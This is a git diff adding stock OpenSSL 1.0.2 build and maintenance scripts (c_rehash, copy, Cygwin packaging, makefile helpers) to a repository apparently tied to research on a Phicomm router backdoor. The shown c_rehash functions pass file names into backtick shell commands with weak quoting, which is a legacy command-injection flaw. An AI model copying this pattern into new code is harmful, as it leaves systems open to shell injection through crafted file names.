+		# Check to see if certificates and/or CRLs present.
+		my ($cert, $crl) = check_file($fname);
+		if(!$cert && !$crl) {
+			print STDERR "WARNING: $fname does not contain a certificate or CRL: skipping\n";
+			next;
+		}
+		link_hash_cert($fname) if($cert);
+		link_hash_crl($fname) if($crl);
+	}
+}
+
+sub check_file {
+	my ($is_cert, $is_crl) = (0,0);
+	my $fname = $_[0];
+	open IN, $fname;
+	while(<IN>) {
+		if(/^-----BEGIN (.*)-----/) {
+			my $hdr = $1;
+			if($hdr =~ /^(X509 |TRUSTED |)CERTIFICATE$/) {
+				$is_cert = 1;
+				last if($is_crl);
+			} elsif($hdr eq "X509 CRL") {
+				$is_crl = 1;
+				last if($is_cert);
+			}
+		}
+	}
+	close IN;
+	return ($is_cert, $is_crl);
+}
+
+
+# Link a certificate to its subject name hash value, each hash is of
+# the form <hash>.<n> where n is an integer. If the hash value already exists
+# then we need to up the value of n, unless its a duplicate in which
+# case we skip the link. We check for duplicates by comparing the
+# certificate fingerprints
+
+sub link_hash_cert {
+		my $fname = $_[0];
+		$fname =~ s/'/'\\''/g;
+		my ($hash, $fprint) = `"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"`;
+		chomp $hash;
+		chomp $fprint;
+		$fprint =~ s/^.*=//;
+		$fprint =~ tr/://d;
+		my $suffix = 0;
+		# Search for an unused hash filename
+		while(exists $hashlist{"$hash.$suffix"}) {
+			# Hash matches: if fingerprint matches its a duplicate cert
+			if($hashlist{"$hash.$suffix"} eq $fprint) {
+				print STDERR "WARNING: Skipping duplicate certificate $fname\n";
+				return;
+			}
+			$suffix++;
+		}
+		$hash .= ".$suffix";
+		if ($symlink_exists) {
+			symlink $fname, $hash;
+			print "link $fname -> $hash\n" if $verbose;
+		} else {
+			open IN,"<$fname" or die "can't open $fname for read";
+			open OUT,">$hash" or die "can't open $hash for write";
+			print OUT <IN>;	# does the job for small text files
+			close OUT;
+			close IN;
+			print "copy $fname -> $hash\n" if $verbose;
+		}
+		$hashlist{$hash} = $fprint;
+}
+
+# Same as above except for a CRL. CRL links are of the form <hash>.r<n>
+
+sub link_hash_crl {
+		my $fname = $_[0];
+		$fname =~ s/'/'\\''/g;
+		my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`;
+		chomp $hash;
+		chomp $fprint;
+		$fprint =~ s/^.*=//;
+		$fprint =~ tr/://d;
+		my $suffix = 0;
+		# Search for an unused hash filename
+		while(exists $hashlist{"$hash.r$suffix"}) {
+			# Hash matches: if fingerprint matches its a duplicate cert
+			if($hashlist{"$hash.r$suffix"} eq $fprint) {
+				print STDERR "WARNING: Skipping duplicate CRL $fname\n";
+				return;
+			}
+			$suffix++;
+		}
+		$hash .= ".r$suffix";
+		if ($symlink_exists) {
+			symlink $fname, $hash;
+			print "link $fname -> $hash\n" if $verbose;
+		} else {
+			system ("cp", $fname, $hash);
+			print "cp $fname -> $hash\n" if $verbose;
+		}
+		$hashlist{$hash} = $fprint;
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/FreeBSD.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/FreeBSD.sh
new file mode 100755
index 0000000..db8edfc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/FreeBSD.sh
@@ -0,0 +1,6 @@
+#!/bin/sh
+
+perl util/perlpath.pl /usr/bin
+perl util/ssldir.pl /usr/local  
+perl util/mk1mf.pl FreeBSD >Makefile.FreeBSD
+perl Configure FreeBSD
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/add_cr.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/add_cr.pl
new file mode 100755
index 0000000..c7b62c1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/add_cr.pl
@@ -0,0 +1,123 @@
+#!/usr/local/bin/perl
+#
+# This adds a copyright message to a souce code file.
+# It also gets the file name correct.
+#
+# perl util/add_cr.pl *.[ch] */*.[ch] */*/*.[ch]
+#
+
+foreach (@ARGV)
+	{
+	&dofile($_);
+	}
+
+sub dofile
+	{
+	local($file)=@_;
+
+	open(IN,"<$file") || die "unable to open $file:$!\n";
+
+	print STDERR "doing $file\n";
+	@in=<IN>;
+
+	return(1) if ($in[0] =~ / NOCW /);
+
+	@out=();
+	open(OUT,">$file.out") || die "unable to open $file.$$:$!\n";
+	push(@out,"/* $file */\n");
+	if (($in[1] !~ /^\/\* Copyright \(C\) [0-9-]+ Eric Young \(eay\@cryptsoft.com\)/))
+		{
+		push(@out,&Copyright);
+		$i=2;
+		@a=grep(/ Copyright \(C\) /,@in);
+		if ($#a >= 0)
+			{
+			while (($i <= $#in) && ($in[$i] ne " */\n"))
+				{ $i++; }
+			$i++ if ($in[$i] eq " */\n");
+
+			while (($i <= $#in) && ($in[$i] =~ /^\s*$/))
+				{ $i++; }
+
+			push(@out,"\n");
+			for ( ; $i <= $#in; $i++)
+				{ push(@out,$in[$i]); }
+			}
+		else
+			{ push(@out,@in); }
+		}
+	else
+		{
+		shift(@in);
+		push(@out,@in);
+		}
+	print OUT @out;
+	close(IN);
+	close(OUT);
+	rename("$file","$file.orig") || die "unable to rename $file:$!\n";
+	rename("$file.out",$file) || die "unable to rename $file.out:$!\n";
+	}
+
+
+
+sub Copyright
+	{
+	return <<'EOF';
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+EOF
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/bat.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/bat.sh
new file mode 100755
index 0000000..4d9a828
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/bat.sh
@@ -0,0 +1,134 @@
+#!/usr/local/bin/perl
+
+$infile="/home/eay/ssl/SSLeay/MINFO";
+
+open(IN,"<$infile") || die "unable to open $infile:$!\n";
+$_=<IN>;
+for (;;)
+	{
+	chop;
+
+	($key,$val)=/^([^=]+)=(.*)/;
+	if ($key eq "RELATIVE_DIRECTORY")
+		{
+		if ($lib ne "")
+			{
+			$uc=$lib;
+			$uc =~ s/^lib(.*)\.a/$1/;
+			$uc =~ tr/a-z/A-Z/;
+			$lib_nam{$uc}=$uc;
+			$lib_obj{$uc}.=$libobj." ";
+			}
+		last if ($val eq "FINISHED");
+		$lib="";
+		$libobj="";
+		$dir=$val;
+		}
+
+	if ($key eq "TEST")
+		{ $test.=&var_add($dir,$val); }
+
+	if (($key eq "PROGS") || ($key eq "E_OBJ"))
+		{ $e_exe.=&var_add($dir,$val); }
+
+	if ($key eq "LIB")
+		{
+		$lib=$val;
+		$lib =~ s/^.*\/([^\/]+)$/$1/;
+		}
+
+	if ($key eq "EXHEADER")
+		{ $exheader.=&var_add($dir,$val); }
+
+	if ($key eq "HEADER")
+		{ $header.=&var_add($dir,$val); }
+
+	if ($key eq "LIBSRC")
+		{ $libsrc.=&var_add($dir,$val); }
+
+	if (!($_=<IN>))
+		{ $_="RELATIVE_DIRECTORY=FINISHED\n"; }
+	}
+close(IN);
+
+@a=split(/\s+/,$libsrc);
+foreach (@a)
+	{
+	print "${_}.c\n";
+	}
+
+sub var_add
+	{
+	local($dir,$val)=@_;
+	local(@a,$_,$ret);
+
+	return("") if $no_engine && $dir =~ /\/engine/;
+	return("") if $no_idea && $dir =~ /\/idea/;
+	return("") if $no_rc2  && $dir =~ /\/rc2/;
+	return("") if $no_rc4  && $dir =~ /\/rc4/;
+	return("") if $no_rsa  && $dir =~ /\/rsa/;
+	return("") if $no_rsa  && $dir =~ /^rsaref/;
+	return("") if $no_dsa  && $dir =~ /\/dsa/;
+	return("") if $no_dh   && $dir =~ /\/dh/;
+	if ($no_des && $dir =~ /\/des/)
+		{
+		if ($val =~ /read_pwd/)
+			{ return("$dir/read_pwd "); }
+		else
+			{ return(""); }
+		}
+	return("") if $no_mdc2 && $dir =~ /\/mdc2/;
+	return("") if $no_sock && $dir =~ /\/proxy/;
+	return("") if $no_bf   && $dir =~ /\/bf/;
+	return("") if $no_cast && $dir =~ /\/cast/;
+
+	$val =~ s/^\s*(.*)\s*$/$1/;
+	@a=split(/\s+/,$val);
+	grep(s/\.[och]$//,@a);
+
+	@a=grep(!/^e_.*_3d$/,@a) if $no_des;
+	@a=grep(!/^e_.*_d$/,@a) if $no_des;
+	@a=grep(!/^e_.*_i$/,@a) if $no_idea;
+	@a=grep(!/^e_.*_r2$/,@a) if $no_rc2;
+	@a=grep(!/^e_.*_bf$/,@a) if $no_bf;
+	@a=grep(!/^e_.*_c$/,@a) if $no_cast;
+	@a=grep(!/^e_rc4$/,@a) if $no_rc4;
+
+	@a=grep(!/(^s2_)|(^s23_)/,@a) if $no_ssl2;
+	@a=grep(!/(^s3_)|(^s23_)/,@a) if $no_ssl3;
+
+	@a=grep(!/(_sock$)|(_acpt$)|(_conn$)|(^pxy_)/,@a) if $no_sock;
+
+	@a=grep(!/(^md2)|(_md2$)/,@a) if $no_md2;
+	@a=grep(!/(^md5)|(_md5$)/,@a) if $no_md5;
+
+	@a=grep(!/(^d2i_r_)|(^i2d_r_)/,@a) if $no_rsa;
+	@a=grep(!/(^p_open$)|(^p_seal$)/,@a) if $no_rsa;
+	@a=grep(!/(^pem_seal$)/,@a) if $no_rsa;
+
+	@a=grep(!/(m_dss$)|(m_dss1$)/,@a) if $no_dsa;
+	@a=grep(!/(^d2i_s_)|(^i2d_s_)|(_dsap$)/,@a) if $no_dsa;
+
+	@a=grep(!/^n_pkey$/,@a) if $no_rsa || $no_rc4;
+
+	@a=grep(!/_dhp$/,@a) if $no_dh;
+
+	@a=grep(!/(^sha[^1])|(_sha$)|(m_dss$)/,@a) if $no_sha;
+	@a=grep(!/(^sha1)|(_sha1$)|(m_dss1$)/,@a) if $no_sha1;
+	@a=grep(!/_mdc2$/,@a) if $no_mdc2;
+
+	@a=grep(!/^engine$/,@a) if $no_engine;
+	@a=grep(!/(^rsa$)|(^genrsa$)|(^req$)|(^ca$)/,@a) if $no_rsa;
+	@a=grep(!/(^dsa$)|(^gendsa$)|(^dsaparam$)/,@a) if $no_dsa;
+	@a=grep(!/^gendsa$/,@a) if $no_sha1;
+	@a=grep(!/(^dh$)|(^gendh$)/,@a) if $no_dh;
+
+	@a=grep(!/(^dh)|(_sha1$)|(m_dss1$)/,@a) if $no_sha1;
+
+	grep($_="$dir/$_",@a);
+	@a=grep(!/(^|\/)s_/,@a) if $no_sock;
+	@a=grep(!/(^|\/)bio_sock/,@a) if $no_sock;
+	$ret=join(' ',@a)." ";
+	return($ret);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/ck_errf.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/ck_errf.pl
new file mode 100755
index 0000000..1a8665a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/ck_errf.pl
@@ -0,0 +1,64 @@
+#!/usr/local/bin/perl
+#
+# This is just a quick script to scan for cases where the 'error'
+# function name in a XXXerr() macro is wrong.
+# 
+# Run in the top level by going
+# perl util/ck_errf.pl */*.c */*/*.c
+#
+
+my $err_strict = 0;
+my $bad = 0;
+
+foreach $file (@ARGV)
+	{
+	if ($file eq "-strict")
+		{
+		$err_strict = 1;
+		next;
+		}
+	open(IN,"<$file") || die "unable to open $file\n";
+	$func="";
+	while (<IN>)
+		{
+		if (!/;$/ && /^\**([a-zA-Z].*[\s*])?([A-Za-z_0-9]+)\(.*([),]|$)/)
+			{
+			/^([^()]*(\([^()]*\)[^()]*)*)\(/;
+			$1 =~ /([A-Za-z_0-9]*)$/;
+			$func = $1;
+			$func =~ tr/A-Z/a-z/;
+			}
+		if (/([A-Z0-9]+)err\(([^,]+)/ && ! /ckerr_ignore/)
+			{
+			$errlib=$1;
+			$n=$2;
+
+			if ($func eq "")
+				{ print "$file:$.:???:$n\n"; $bad = 1; next; }
+
+			if ($n !~ /([^_]+)_F_(.+)$/)
+				{
+		#		print "check -$file:$.:$func:$n\n";
+				next;
+				}
+			$lib=$1;
+			$n=$2;
+
+			if ($lib ne $errlib)
+				{ print "$file:$.:$func:$n [${errlib}err]\n"; $bad = 1; next; }
+
+			$n =~ tr/A-Z/a-z/;
+			if (($n ne $func) && ($errlib ne "SYS"))
+				{ print "$file:$.:$func:$n\n"; $bad = 1; next; }
+	#		print "$func:$1\n";
+			}
+		}
+	close(IN);
+        }
+
+if ($bad && $err_strict)
+	{
+	print STDERR "FATAL: error discrepancy\n";
+	exit 1;
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/clean-depend.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/clean-depend.pl
new file mode 100755
index 0000000..d3525b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/clean-depend.pl
@@ -0,0 +1,58 @@
+#!/usr/local/bin/perl -w
+# Clean the dependency list in a makefile of standard includes...
+# Written by Ben Laurie <ben@algroup.co.uk> 19 Jan 1999
+
+use strict;
+
+while(<STDIN>) {
+    print;
+    last if /^# DO NOT DELETE THIS LINE/;
+}
+
+my %files;
+
+my $thisfile="";
+while(<STDIN>) {
+    my ($dummy, $file,$deps)=/^((.*):)? (.*)$/;
+    my $origfile="";
+    $thisfile=$file if defined $file;
+    next if !defined $deps;
+    $origfile=$thisfile;
+    $origfile=~s/\.o$/.c/;
+    my @deps=split ' ',$deps;
+    @deps=grep(!/^\//,@deps);
+    @deps=grep(!/^\\$/,@deps);
+    @deps=grep(!/^$origfile$/,@deps);
+# pull out the kludged kerberos header (if present).
+    @deps=grep(!/^[.\/]+\/krb5.h/,@deps);
+    push @{$files{$thisfile}},@deps;
+}
+
+my $file;
+foreach $file (sort keys %files) {
+    my $len=0;
+    my $dep;
+    my $origfile=$file;
+    $origfile=~s/\.o$/.c/;
+    $file=~s/^\.\///;
+    push @{$files{$file}},$origfile;
+    my $prevdep="";
+
+    # Remove leading ./ before sorting
+    my @deps = map { $_ =~ s/^\.\///; $_ } @{$files{$file}};
+
+    foreach $dep (sort @deps) {
+	$dep=~s/^\.\///;
+	next if $prevdep eq $dep; # to exterminate duplicates...
+	$prevdep = $dep;
+	$len=0 if $len+length($dep)+1 >= 80;
+	if($len == 0) {
+	    print "\n$file:";
+	    $len=length($file)+1;
+	}
+	print " $dep";
+	$len+=length($dep)+1;
+    }
+}
+
+print "\n";
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/copy-if-different.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/copy-if-different.pl
new file mode 100644
index 0000000..ec99e08
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/copy-if-different.pl
@@ -0,0 +1,78 @@
+#!/usr/local/bin/perl
+
+use strict;
+
+use Fcntl;
+
+# copy-if-different.pl
+
+# Copy to the destination if the source is not the same as it.
+
+my @filelist;
+
+foreach my $arg (@ARGV) {
+	$arg =~ s|\\|/|g;	# compensate for bug/feature in cygwin glob...
+	foreach (glob $arg)
+		{
+		push @filelist, $_;
+		}
+}
+
+my $fnum = @filelist;
+
+if ($fnum <= 1)
+	{
+	die "Need at least two filenames";
+	}
+
+my $dest = pop @filelist;
+
+if ($fnum > 2 && ! -d $dest)
+	{
+	die "Destination must be a directory";
+	}
+
+foreach (@filelist)
+	{
+        my $dfile;
+	if (-d $dest)
+		{
+		$dfile = $_;
+		$dfile =~ s|^.*[/\\]([^/\\]*)$|$1|;
+		$dfile = "$dest/$dfile";
+		}
+	else
+		{
+		$dfile = $dest;
+		}
+
+	my $buf;
+	if (-f $dfile)
+		{
+		sysopen(IN, $_, O_RDONLY|O_BINARY) || die "Can't Open $_";
+		sysopen(OUT, $dfile, O_RDONLY|O_BINARY)
+		  || die "Can't Open $dfile";
+		while (sysread IN, $buf, 10240)
+			{
+			my $b2;
+			goto copy if !sysread(OUT, $b2, 10240) || $buf ne $b2;
+			}
+		goto copy if sysread(OUT, $buf, 1);
+		close(IN);
+		close(OUT);
+		print "NOT copying: $_ to $dfile\n";
+		next;
+		}
+      copy:
+	sysopen(IN, $_, O_RDONLY|O_BINARY) || die "Can't Open $_";
+	sysopen(OUT, $dfile, O_WRONLY|O_CREAT|O_TRUNC|O_BINARY)
+					|| die "Can't Open $dfile";
+	while (sysread IN, $buf, 10240)
+		{
+		syswrite(OUT, $buf, length($buf));
+		}
+	close(IN);
+	close(OUT);
+	print "Copying: $_ to $dfile\n";
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/copy.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/copy.pl
new file mode 100644
index 0000000..eba6d58
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/copy.pl
@@ -0,0 +1,70 @@
+#!/usr/local/bin/perl
+
+use Fcntl;
+
+
+# copy.pl
+
+# Perl script 'copy' comment. On Windows the built in "copy" command also
+# copies timestamps: this messes up Makefile dependencies.
+
+my $stripcr = 0;
+
+my $arg;
+
+foreach $arg (@ARGV) {
+	if ($arg eq "-stripcr")
+		{
+		$stripcr = 1;
+		next;
+		}
+	$arg =~ s|\\|/|g;	# compensate for bug/feature in cygwin glob...
+	foreach (glob $arg)
+		{
+		push @filelist, $_;
+		}
+}
+
+$fnum = @filelist;
+
+if ($fnum <= 1)
+	{
+	die "Need at least two filenames";
+	}
+
+$dest = pop @filelist;
+	
+if ($fnum > 2 && ! -d $dest)
+	{
+	die "Destination must be a directory";
+	}
+
+foreach (@filelist)
+	{
+	if (-d $dest)
+		{
+		$dfile = $_;
+		$dfile =~ s|^.*[/\\]([^/\\]*)$|$1|;
+		$dfile = "$dest/$dfile";
+		}
+	else
+		{
+		$dfile = $dest;
+		}
+	sysopen(IN, $_, O_RDONLY|O_BINARY) || die "Can't Open $_";
+	sysopen(OUT, $dfile, O_WRONLY|O_CREAT|O_TRUNC|O_BINARY)
+					|| die "Can't Open $dfile";
+	while (sysread IN, $buf, 10240)
+		{
+		if ($stripcr)
+			{
+			$buf =~ tr/\015//d;
+			}
+		syswrite(OUT, $buf, length($buf));
+		}
+	close(IN);
+	close(OUT);
+	print "Copying: $_ to $dfile\n";
+	}
+		
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/cygwin.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/cygwin.sh
new file mode 100755
index 0000000..cfdb04d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/cygwin.sh
@@ -0,0 +1,154 @@
+#!/bin/bash
+#
+# This script configures, builds and packs the binary package for
+# the Cygwin net distribution version of OpenSSL
+#
+
+# Uncomment when debugging
+#set -x
+
+CONFIG_OPTIONS="--prefix=/usr shared zlib no-idea no-rc5"
+INSTALL_PREFIX=/tmp/install/INSTALL
+
+VERSION=
+SHLIB_VERSION_NUMBER=
+SUBVERSION=$1
+
+function cleanup()
+{
+  rm -rf ${INSTALL_PREFIX}/etc
+  rm -rf ${INSTALL_PREFIX}/usr
+}
+
+function get_openssl_version()
+{
+  eval `grep '^VERSION=' Makefile`
+  if [ -z "${VERSION}" ]
+  then
+    echo "Error: Couldn't retrieve OpenSSL version from Makefile."
+    echo "       Check value of variable VERSION in Makefile."
+    exit 1
+  fi
+  eval `grep '^SHLIB_VERSION_NUMBER=' Makefile`
+  if [ -z "${SHLIB_VERSION_NUMBER}" ]
+  then
+    echo "Error: Couldn't retrieve OpenSSL shared lib version from Makefile."
+    echo " Check value of variable SHLIB_VERSION_NUMBER in Makefile."
+    exit 1
+  fi
+}
+
+function base_install()
+{
+  mkdir -p ${INSTALL_PREFIX}
+  cleanup
+  make install INSTALL_PREFIX="${INSTALL_PREFIX}"
+}
+
+function doc_install()
+{
+  DOC_DIR=${INSTALL_PREFIX}/usr/share/doc/openssl
+
+  mkdir -p ${DOC_DIR}
+  cp CHANGES CHANGES.SSLeay INSTALL LICENSE NEWS README ${DOC_DIR}
+
+  create_cygwin_readme
+}
+
+function certs_install()
+{
+  CERTS_DIR=${INSTALL_PREFIX}/usr/ssl/certs
+
+  mkdir -p ${CERTS_DIR}
+  cp -rp certs/* ${CERTS_DIR}
+}
+
+function create_cygwin_readme()
+{
+  README_DIR=${INSTALL_PREFIX}/usr/share/doc/Cygwin
+  README_FILE=${README_DIR}/openssl-${VERSION}.README
+
+  mkdir -p ${README_DIR}
+  cat > ${README_FILE} <<- EOF
+	The Cygwin version has been built using the following configure:
+
+	  ./config ${CONFIG_OPTIONS}
+
+	The IDEA and RC5 algorithms are disabled due to patent and/or
+	licensing issues.
+	EOF
+}
+
+function create_profile_files()
+{
+  PROFILE_DIR=${INSTALL_PREFIX}/etc/profile.d
+
+  mkdir -p $PROFILE_DIR
+  cat > ${PROFILE_DIR}/openssl.sh <<- "EOF"
+	export MANPATH="${MANPATH}:/usr/ssl/man"
+	EOF
+  cat > ${PROFILE_DIR}/openssl.csh <<- "EOF"
+	if ( $?MANPATH ) then
+	  setenv MANPATH "${MANPATH}:/usr/ssl/man"
+	else
+	  setenv MANPATH ":/usr/ssl/man"
+	endif
+	EOF
+}
+
+if [ -z "${SUBVERSION}" ]
+then
+  echo "Usage: $0 subversion"
+  exit 1
+fi
+
+if [ ! -f config ]
+then
+  echo "You must start this script in the OpenSSL toplevel source dir."
+  exit 1
+fi
+
+./config ${CONFIG_OPTIONS}
+
+get_openssl_version
+
+make depend || exit 1
+
+make || exit 1
+
+base_install
+
+doc_install
+
+certs_install
+
+create_cygwin_readme
+
+create_profile_files
+
+cd ${INSTALL_PREFIX}
+chmod u+w usr/lib/engines/*.so
+strip usr/bin/*.exe usr/bin/*.dll usr/lib/engines/*.so
+chmod u-w usr/lib/engines/*.so
+
+# Runtime package
+tar cjf libopenssl${SHLIB_VERSION_NUMBER//[!0-9]/}-${VERSION}-${SUBVERSION}.tar.bz2 \
+     usr/bin/cyg*dll
+# Base package
+find etc usr/bin/openssl.exe usr/bin/c_rehash usr/lib/engines usr/share/doc \
+     usr/ssl/certs usr/ssl/man/man[157] usr/ssl/misc usr/ssl/openssl.cnf \
+     usr/ssl/private \
+     -empty -o \! -type d |
+tar cjfT openssl-${VERSION}-${SUBVERSION}.tar.bz2 -
+# Development package
+find usr/include usr/lib/*.a usr/lib/pkgconfig usr/ssl/man/man3 \
+     -empty -o \! -type d |
+tar cjfT openssl-devel-${VERSION}-${SUBVERSION}.tar.bz2 -
+
+ls -l openssl-${VERSION}-${SUBVERSION}.tar.bz2
+ls -l openssl-devel-${VERSION}-${SUBVERSION}.tar.bz2
+ls -l libopenssl${SHLIB_VERSION_NUMBER//[!0-9]/}-${VERSION}-${SUBVERSION}.tar.bz2
+
+cleanup
+
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/deleof.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/deleof.pl
new file mode 100755
index 0000000..155acd8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/deleof.pl
@@ -0,0 +1,7 @@
+#!/usr/local/bin/perl
+
+while (<>)
+	{
+	print
+	last if (/^# DO NOT DELETE THIS LINE/);
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/deltree.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/deltree.com
new file mode 100644
index 0000000..9f36b1a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/deltree.com
@@ -0,0 +1,34 @@
+$! DELTREE.COM
+$
+$ call deltree 'p1'
+$ exit $status
+$
+$ deltree: subroutine ! P1 is a name of a directory
+$	on control_y then goto dt_STOP
+$	on warning then goto dt_exit
+$	_dt_def = f$trnlnm("SYS$DISK")+f$directory()
+$	if f$parse(p1) .eqs. "" then exit
+$	set default 'f$parse(p1,,,"DEVICE")''f$parse(p1,,,"DIRECTORY")'
+$	p1 = f$parse(p1,,,"NAME") + f$parse(p1,,,"TYPE")
+$	_fp = f$parse(".DIR",p1)
+$ dt_loop:
+$	_f = f$search(_fp)
+$	if _f .eqs. "" then goto dt_loopend
+$	call deltree [.'f$parse(_f,,,"NAME")']*.*
+$	goto dt_loop
+$ dt_loopend:
+$	_fp = f$parse(p1,".;*")
+$	if f$search(_fp) .eqs. "" then goto dt_exit
+$	set noon
+$	set file/prot=(S:RWED,O:RWED,G:RWED,W:RWED) '_fp'
+$	set on
+$	delete/nolog '_fp'
+$ dt_exit:
+$	set default '_dt_def'
+$	goto dt_end
+$ dt_STOP:
+$	set default '_dt_def'
+$	stop/id=""
+$	exit
+$ dt_end:
+$	endsubroutine
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/dirname.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/dirname.pl
new file mode 100644
index 0000000..d7a66d9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/dirname.pl
@@ -0,0 +1,18 @@
+#!/usr/local/bin/perl
+
+if ($#ARGV < 0) {
+    die "dirname.pl: too few arguments\n";
+} elsif ($#ARGV > 0) {
+    die "dirname.pl: too many arguments\n";
+}
+
+my $d = $ARGV[0];
+
+if ($d =~ m|.*/.*|) {
+    $d =~ s|/[^/]*$||;
+} else {
+    $d = ".";
+}
+
+print $d,"\n";
+exit(0);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/do_ms.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/do_ms.sh
new file mode 100755
index 0000000..515b074
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/do_ms.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+#
+# generate the Microsoft makefiles and .def files
+#
+
+PATH=util:../util:$PATH
+
+# perl util/mk1mf.pl no-sock VC-MSDOS >ms/msdos.mak
+# perl util/mk1mf.pl VC-W31-32 >ms/w31.mak
+perl util/mk1mf.pl dll VC-WIN16 >ms/w31dll.mak
+# perl util/mk1mf.pl VC-WIN32 >ms/nt.mak
+perl util/mk1mf.pl dll VC-WIN32 >ms/ntdll.mak
+perl util/mk1mf.pl Mingw32 >ms/mingw32.mak
+perl util/mk1mf.pl Mingw32-files >ms/mingw32f.mak
+
+perl util/mkdef.pl 16 libeay > ms/libeay16.def
+perl util/mkdef.pl 32 libeay > ms/libeay32.def
+perl util/mkdef.pl 16 ssleay > ms/ssleay16.def
+perl util/mkdef.pl 32 ssleay > ms/ssleay32.def
